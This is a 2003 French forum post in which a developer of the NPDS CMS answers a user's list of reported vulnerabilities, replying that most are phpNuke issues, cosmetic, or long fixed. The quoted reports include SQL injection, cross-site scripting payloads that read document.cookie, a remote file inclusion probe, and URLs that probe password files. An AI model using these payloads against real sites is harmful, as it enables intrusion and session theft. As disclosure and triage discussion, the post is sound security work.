developpeur
 24581 
|  Posté : 18-06-2003 21:30
Citation : "18-06-2003 17:46, Anonyme a écrit :
Ya un erreur sur le port 80
qui permet une attaque par deny de service
http://target.com/modules.php?name=Your_Account&op=userinfo&uname=
sur certain site npds, vous l'avez corrigez ?
http://www.nukesite.com/modules.php?name=News&file=article&sid=1234%20or%
201=1
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)
Et celle là ???
Ca marche pas depuis laquelle ?
Et j'avais aussi celle-ci :
http://target.com/modules.php?op=modload&name=News&file=index&catid=&topic=>
==> c'est du phpnuke cela pas du NPDS (cela ne fait rien en dehors de faire merder le theme graphique)
Là je suis sûr de moi, le site il bug complètement quand on fait :
http://www.npds.org/forum/memberlist.php?
même sur le tiens dev.
==> cela ne fait rien en dehors de faire merder le theme graphique
http://www.npds.org/chat/!nicks.txt
http://www.npds.org/chat/!pwds.txt
==> cela ne fait rien en dehors de faire merder le theme graphique du Chat
<!script>alert(!!document.cookie!!);<!/script>
==> marche plus depuis longtemps ...
J'avais aussi celle là :
http://target/article.php?sid="><Img Src=!!javascript!!:alert(!!document.cookie!!)><Img Src="
c'est une css...
==> marche plus depuis longtemps ...
Et celle-ci sur le chat :
http://www.target.com/chat/data/usr
http://www.npds.org/user.php?caselist[bad_file.txt][path]=http://localhost
==> marche plus depuis longtemps ...
celle si qui marche bien aussi :
http://www.npds.org/forum/member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C/font%3E%3Cscript%3Ealert(%22Ruef%22);%3C/script%3E%3C/div%3E
==> Tu est certains ????
----------
|
